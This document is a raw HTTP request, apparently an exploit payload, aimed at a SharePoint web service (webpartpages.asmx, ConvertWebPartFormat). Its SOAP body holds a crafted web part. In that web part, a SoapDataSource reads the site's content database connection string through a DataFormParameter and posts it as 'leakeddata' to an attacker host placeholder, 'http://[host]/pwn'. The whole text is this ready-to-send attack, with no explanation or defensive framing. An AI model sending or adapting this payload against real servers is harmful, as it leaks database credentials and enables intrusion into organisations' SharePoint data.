POST /_vti_bin/webpartpages.asmx HTTP/1.1Host: splab13SOAPAction: http://microsoft.com/sharepoint/webpartpages/ConvertWebPartFormatUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0Connection: keep-aliveContent-Type: text/xml; charset=utf-8Content-Length: 1733
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ConvertWebPartFormat xmlns="http://microsoft.com/sharepoint/webpartpages"><inputFormat><![CDATA[<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPages" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>      <%@ Register TagPrefix="att" Namespace="Microsoft.SharePoint.WebControls" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %><WebPartPages:WebPartZone id="id00" runat="server"><ZoneTemplate>
<WebPartPages:XsltListFormWebPart id="id01" runat="server"> <XmlDefinitionLink>http://webdb.com/aaaa</XmlDefinitionLink>  <DataSources>  <att:SoapDataSource runat="server" SelectUrl="http://[host]/pwn">      <SelectCommand>        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">          <soap:Body>          <leakeddata>{leak}</leakeddata>          </soap:Body>        </soap:Envelope>      </SelectCommand>      <SelectParameters>        <WebPartPages:DataFormParameter Name="leak" PropertyName="Parent.Controls[1].Controls[0].Web.Site.ContentDatabase.DatabaseConnectionString" DefaultValue="NULL"/>      </SelectParameters>    </att:SoapDataSource>   </DataSources>   </WebPartPages:XsltListFormWebPart><att:TemplateContainer runat="server" id="f01" /></ZoneTemplate></WebPartPages:WebPartZone> 
]]></inputFormat></ConvertWebPartFormat></soap:Body></soap:Envelope>